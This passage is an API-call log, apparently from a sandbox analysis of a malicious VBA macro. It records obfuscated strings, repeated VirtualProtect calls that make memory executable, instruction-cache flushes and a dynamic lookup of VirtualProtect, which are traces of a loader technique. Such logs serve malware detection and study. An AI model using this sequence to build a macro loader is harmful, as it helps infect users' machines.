pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.347] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.348] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.348] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.348] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.348] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.348] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.348] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.403] GetAsyncKeyState (vKey=3) returned 0 [0096.644] GetAsyncKeyState (vKey=3) returned 0 [0096.860] GetAsyncKeyState (vKey=3) returned 0 [0097.145] GetAsyncKeyState (vKey=3) returned 0 [0097.360] GetAsyncKeyState (vKey=3) returned 0 [0097.634] GetAsyncKeyState (vKey=3) returned 0 [0097.852] GetAsyncKeyState (vKey=3) returned 0 [0098.078] GetAsyncKeyState (vKey=3) returned 0 [0098.300] GetAsyncKeyState (vKey=3) returned 0 [0098.522] GetAsyncKeyState (vKey=3) returned 0 [0098.736] GetAsyncKeyState (vKey=3) returned 0 [0098.999] GetAsyncKeyState (vKey=3) returned 0 [0099.217] GetAsyncKeyState (vKey=3) returned 0 [0099.478] GetAsyncKeyState (vKey=3) returned 0 [0099.765] GetAsyncKeyState (vKey=3) returned 0 [0099.952] GetAsyncKeyState (vKey=3) returned 0 [0100.242] GetAsyncKeyState (vKey=3) returned 0 [0100.242] SafeArrayDestroyData (psa=0xc98b980) returned 0x0 [0100.252] SafeArrayDestroyDescriptor (psa=0xc98b980) returned 0x0 [0100.252] SafeArrayCopy (in: psa=0xc98ba40, ppsaOut=0x197c84 | out: ppsaOut=0x197c84) returned 0x0 [0100.327] SafeArrayCopy (in: psa=0xc98bda0, ppsaOut=0x197e98 | out: ppsaOut=0x197e98) returned 0x0 [0100.407] SafeArrayCopy (in: psa=0xc98bb90, ppsaOut=0x197ff4 | out: ppsaOut=0x197ff4) returned 0x0 [0100.499] GetAsyncKeyState (vKey=3) returned 0 [0100.499] CRetailMalloc_Alloc () returned 0xf4faa10 [0100.500] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.500] memcpy (in: _Dst=0xb2a5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0100.500] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.500] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.500] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x96\x97\x97\x97\x97", cchCount2=-1) returned 3 [0100.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82e8a, cbMultiByte=7, lpWideCharStr=0x1976c4, cchWideChar=8 | out: lpWideCharStr="––————") returned 7 [0100.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cda, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––————") returned 7 [0100.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cda, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––————") returned 7 [0100.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cda, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––————") returned 7 [0100.501] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x96", cchCount1=-1, lpString2="\x96\x96\x97\x97\x97\x97", cchCount2=-1) returned 3 [0100.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302cda, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––————") returned 7 [0100.501] CRetailMalloc_Alloc () returned 0xf4a1e48 [0100.501] _mbscpy_s (in: _Dst=0xf4a1e48, _DstSizeInBytes=0x7, _Src=0x11302cda | out: _Dst=0xf4a1e48) returned 0x0 [0100.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40c3a, cbMultiByte=14, lpWideCharStr=0x197734, cchWideChar=15 | out: lpWideCharStr="_B_var_––————") returned 14 [0100.502] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x7, _Src=0x11302cda | out: _Dst=0x19779c) returned 0x0 [0100.502] CRetailMalloc_Free () returned 0x1 [0100.502] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0100.502] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.502] memcpy (in: _Dst=0xb2a516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0100.502] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.502] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.502] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.502] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0100.502] memcpy (in: _Dst=0xf4faa32, _Src=0x197878, _Size=0x1 | out: _Dst=0xf4faa32) returned 0xf4faa32 [0100.502] memcpy (in: _Dst=0xf4faa88, _Src=0x197944, _Size=0x18 | out: _Dst=0xf4faa88) returned 0xf4faa88 [0100.502] CRetailMalloc_Realloc () returned 0xf4faa10 [0100.503] CRetailMalloc_Free () returned 0x1 [0100.503] GetCurrentProcess () returned 0xffffffff [0100.503] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0100.503] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.504] GetCurrentProcess () returned 0xffffffff [0100.504] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0100.504] GetCurrentProcess () returned 0xffffffff [0100.504] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0100.504] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.505] GetCurrentProcess () returned 0xffffffff [0100.505] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0100.505] GetCurrentProcess () returned 0xffffffff [0100.505] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0100.505] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.506] GetCurrentProcess () returned 0xffffffff [0100.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0100.506] GetCurrentProcess () returned 0xffffffff [0100.506] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0100.506] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.507] GetCurrentProcess () returned 0xffffffff [0100.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0100.507] GetCurrentProcess () returned 0xffffffff [0100.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0100.507] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.507] GetCurrentProcess () returned 0xffffffff [0100.507] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0100.507] GetCurrentProcess () returned 0xffffffff [0100.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0100.508] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.508] GetCurrentProcess () returned 0xffffffff [0100.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0100.508] GetCurrentProcess () returned 0xffffffff [0100.508] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0100.508] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.509] GetCurrentProcess () returned 0xffffffff [0100.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0100.509] GetCurrentProcess () returned 0xffffffff [0100.509] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0100.509] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.510] GetCurrentProcess () returned 0xffffffff [0100.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0100.510] GetCurrentProcess () returned 0xffffffff [0100.510] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0100.510] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.511] GetCurrentProcess () returned 0xffffffff [0100.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0100.511] GetCurrentProcess () returned 0xffffffff [0100.511] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0100.511] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.512] GetCurrentProcess () returned 0xffffffff [0100.512] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0100.512] GetCurrentProcess () returned 0xffffffff [0100.512] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0100.512] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.513] GetCurrentProcess () returned 0xffffffff [0100.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0100.513] GetCurrentProcess () returned 0xffffffff [0100.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0100.513] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.513] GetCurrentProcess () returned 0xffffffff [0100.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0100.513] GetCurrentProcess () returned 0xffffffff [0100.513] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0100.513] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.514] GetCurrentProcess () returned 0xffffffff [0100.514] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0100.514] GetCurrentProcess () returned 0xffffffff [0100.514] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0100.514] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.515] GetCurrentProcess () returned 0xffffffff [0100.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0100.515] GetCurrentProcess () returned 0xffffffff [0100.515] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0100.515] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.516] GetCurrentProcess () returned 0xffffffff [0100.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0100.516] GetCurrentProcess () returned 0xffffffff [0100.516] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0100.516] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.517] GetCurrentProcess () returned 0xffffffff [0100.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0100.517] GetCurrentProcess () returned 0xffffffff [0100.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0100.517] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.517] GetCurrentProcess () returned 0xffffffff [0100.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0100.517] GetCurrentProcess () returned 0xffffffff [0100.517] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0100.517] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.518] GetCurrentProcess () returned 0xffffffff [0100.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0100.518] GetCurrentProcess () returned 0xffffffff [0100.518] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0100.518] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.519] GetCurrentProcess () returned 0xffffffff [0100.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0100.519] GetCurrentProcess () returned 0xffffffff [0100.519] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0100.519] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.520] GetCurrentProcess () returned 0xffffffff [0100.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0100.520] GetCurrentProcess () returned 0xffffffff [0100.520] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0100.520] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.521] GetCurrentProcess () returned 0xffffffff [0100.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0100.521] GetCurrentProcess () returned 0xffffffff [0100.521] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0100.521] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.522] GetCurrentProcess () returned 0xffffffff [0100.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0100.522] GetCurrentProcess () returned 0xffffffff [0100.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0100.522] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.522] GetCurrentProcess () returned 0xffffffff [0100.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0100.522] GetCurrentProcess () returned 0xffffffff [0100.522] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0100.522] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.523] GetCurrentProcess () returned 0xffffffff [0100.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0100.523] GetCurrentProcess () returned 0xffffffff [0100.523] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0100.523] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.524] GetCurrentProcess () returned 0xffffffff [0100.524] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0100.524] GetCurrentProcess () returned 0xffffffff [0100.524] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0100.524] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.525] GetCurrentProcess () returned 0xffffffff [0100.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0100.525] GetCurrentProcess () returned 0xffffffff [0100.525] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0100.525] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.526] GetCurrentProcess () returned 0xffffffff [0100.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0100.526] GetCurrentProcess () returned 0xffffffff [0100.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0100.526] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.526] GetCurrentProcess () returned 0xffffffff [0100.526] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0100.527] GetCurrentProcess () returned 0xffffffff [0100.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0100.527] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.527] GetCurrentProcess () returned 0xffffffff [0100.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0100.527] GetCurrentProcess () returned 0xffffffff [0100.527] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0100.527] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.528] GetCurrentProcess () returned 0xffffffff [0100.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0100.528] GetCurrentProcess () returned 0xffffffff [0100.528] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0100.528] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0100.529] GetCurrentProcess () returned 0xffffffff [0100.529] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0100.530] GetAsyncKeyState (vKey=3) returned 0 [0100.530] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0100.530] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0100.530] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0100.530] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0100.530] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0100.530] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0100.530] VarAdd (in: pvarLeft=0x198068, pvarRight=0x198018, pvarResult=0x198048 | out: pvarResult=0x198048) returned 0x0 [0100.531] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.531] _stricmp (_Str1="kernel32", _Str2="VBE6.DLL") returned -11 [0100.531] LoadLibraryA (lpLibFileName="kernel32") returned 0x76720000 [0100.532] SetErrorMode (uMode=0x8001) returned 0x8001 [0100.532] GetProcAddress (hModule=0x76720000, lpProcName="VirtualProtect") returned 0x76737a50 [0100.533] VirtualProtect (in: lpAddress=0x9d44020, dwSize=0x15fab2, flNewProtect=0x40, lpflOldProtect=0x197fdc | out: lpflOldProtect=0x197fdc*=0x4) returned 1 [0101.365] GetLastError () returned 0x5 [0101.365] GetAsyncKeyState (vKey=3) returned 0 [0101.369] CRetailMalloc_Alloc () returned 0xf4faad8 [0101.369] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.369] memcpy (in: _Dst=0xb2a5270, _Src=0x1978a4, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0101.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42f6ae, cbMultiByte=12, lpWideCharStr=0x9be0228, cchWideChar=26 | out: lpWideCharStr="GHnGK3YWsN_G") returned 12 [0101.369] CRetailMalloc_Alloc () returned 0xf4e2728 [0101.369] memcpy (in: _Dst=0xf4e273c, _Src=0x9be0224, _Size=0x1e | out: _Dst=0xf4e273c) returned 0xf4e273c [0101.369] memcpy (in: _Dst=0xb2a5168, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.370] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.370] memcpy (in: _Dst=0xb2a5168, _Src=0x1976f4, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.370] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42f6ca, cbMultiByte=10, lpWideCharStr=0x9be0936, cchWideChar=22 | out: lpWideCharStr="IHLLXTW2lF") returned 10 [0101.370] memcpy (in: _Dst=0xf4e2760, _Src=0x9be0932, _Size=0x1a | out: _Dst=0xf4e2760) returned 0xf4e2760 [0101.370] memcpy (in: _Dst=0xb2a516c, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0101.370] memcpy (in: _Dst=0xb2a516c, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0101.370] memcpy (in: _Dst=0xb2a5170, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0101.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42f6e2, cbMultiByte=7, lpWideCharStr=0x9be0cd8, cchWideChar=16 | out: lpWideCharStr="hjoQUX7") returned 7 [0101.370] memcpy (in: _Dst=0xf4e2780, _Src=0x9be0cd4, _Size=0x14 | out: _Dst=0xf4e2780) returned 0xf4e2780 [0101.371] memcpy (in: _Dst=0xb2a5174, _Src=0x1978bc, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0101.371] memcpy (in: _Dst=0xb2a5174, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0101.371] memcpy (in: _Dst=0x1976cc, _Src=0x197740, _Size=0x8 | out: _Dst=0x1976cc) returned 0x1976cc [0101.371] memcpy (in: _Dst=0xf4b7240, _Src=0x1976cc, _Size=0x8 | out: _Dst=0xf4b7240) returned 0xf4b7240 [0101.371] CRetailMalloc_Alloc () returned 0xf4f40d0 [0101.371] CRetailMalloc_Free () returned 0x1 [0101.371] memcpy (in: _Dst=0xb2a5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0101.371] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x97\x96\x96\x96\x96\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x97\x96\x96\x97\x97\x97\x96\x97\x96\x97", cchCount1=-1, lpString2="\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount2=-1) returned 3 [0101.371] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x96\x97\x96\x97\x97\x97\x96\x97\x97\x96\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount1=-1, lpString2="\x97\x96\x97\x96\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x96\x96", cchCount2=-1) returned 1 [0101.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82eae, cbMultiByte=30, lpWideCharStr=0x1976a4, cchWideChar=31 | out: lpWideCharStr="—–—–––——————––—–—————–———––––") returned 30 [0101.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e7e, cbMultiByte=30, lpWideCharStr=0x197704, cchWideChar=31 